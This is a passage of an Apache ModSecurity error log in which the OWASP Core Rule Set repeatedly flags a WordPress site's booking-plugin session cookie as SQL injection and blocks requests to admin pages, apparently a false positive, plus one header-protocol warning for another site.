[Mon May 11 22:20:16.690243 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI5_6FW67LJTsgN3jQKLwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:17.349838 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6AaFW67LJTsgN3jQKMAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:17.350124 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6AaFW67LJTsgN3jQKMAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:17.960809 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6AaFW67LJTsgN3jQKMAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:18.542940 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6AqFW67LJTsgN3jQKMgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:18.543361 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6AqFW67LJTsgN3jQKMgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:19.196311 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6AqFW67LJTsgN3jQKMgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:19.636929 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6A6FW67LJTsgN3jQKNAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:19.637229 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6A6FW67LJTsgN3jQKNAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:20.202136 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6A6FW67LJTsgN3jQKNAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:20.447554 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6BKFW67LJTsgN3jQKNQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:20.447872 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6BKFW67LJTsgN3jQKNQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:21.108702 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6BKFW67LJTsgN3jQKNQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:21.351858 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6BaFW67LJTsgN3jQKNwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:21.352204 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6BaFW67LJTsgN3jQKNwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:21.724361 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6BaFW67LJTsgN3jQKNwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:22.445099 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6BqFW67LJTsgN3jQKOAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:22.445446 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6BqFW67LJTsgN3jQKOAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:23.074889 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6BqFW67LJTsgN3jQKOAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:23.736077 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6B6FW67LJTsgN3jQKOwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:23.736417 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6B6FW67LJTsgN3jQKOwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:24.402351 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6B6FW67LJTsgN3jQKOwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:25.036900 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6CaFW67LJTsgN3jQKPgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:25.037208 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6CaFW67LJTsgN3jQKPgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:25.741860 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6CaFW67LJTsgN3jQKPgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:26.465200 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6CqFW67LJTsgN3jQKRAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:26.465492 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6CqFW67LJTsgN3jQKRAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:26.868589 2026] [security2:error] [pid 1590352:tid 1590416] [client 43.156.44.207:36968] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/highlight/les-avantages-de-la-mobilite-professionnelle/"] [unique_id "agI6Cq1q0G_aXAqWauT5MAAAAJg"]
[Mon May 11 22:20:27.053179 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6CqFW67LJTsgN3jQKRAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:27.255057 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6C6FW67LJTsgN3jQKSgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:27.255370 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6C6FW67LJTsgN3jQKSgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:27.807009 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6C6FW67LJTsgN3jQKSgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:28.336521 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6DKFW67LJTsgN3jQKTgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:28.336824 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6DKFW67LJTsgN3jQKTgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:28.698472 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6DKFW67LJTsgN3jQKTgAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:20:29.661806 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id 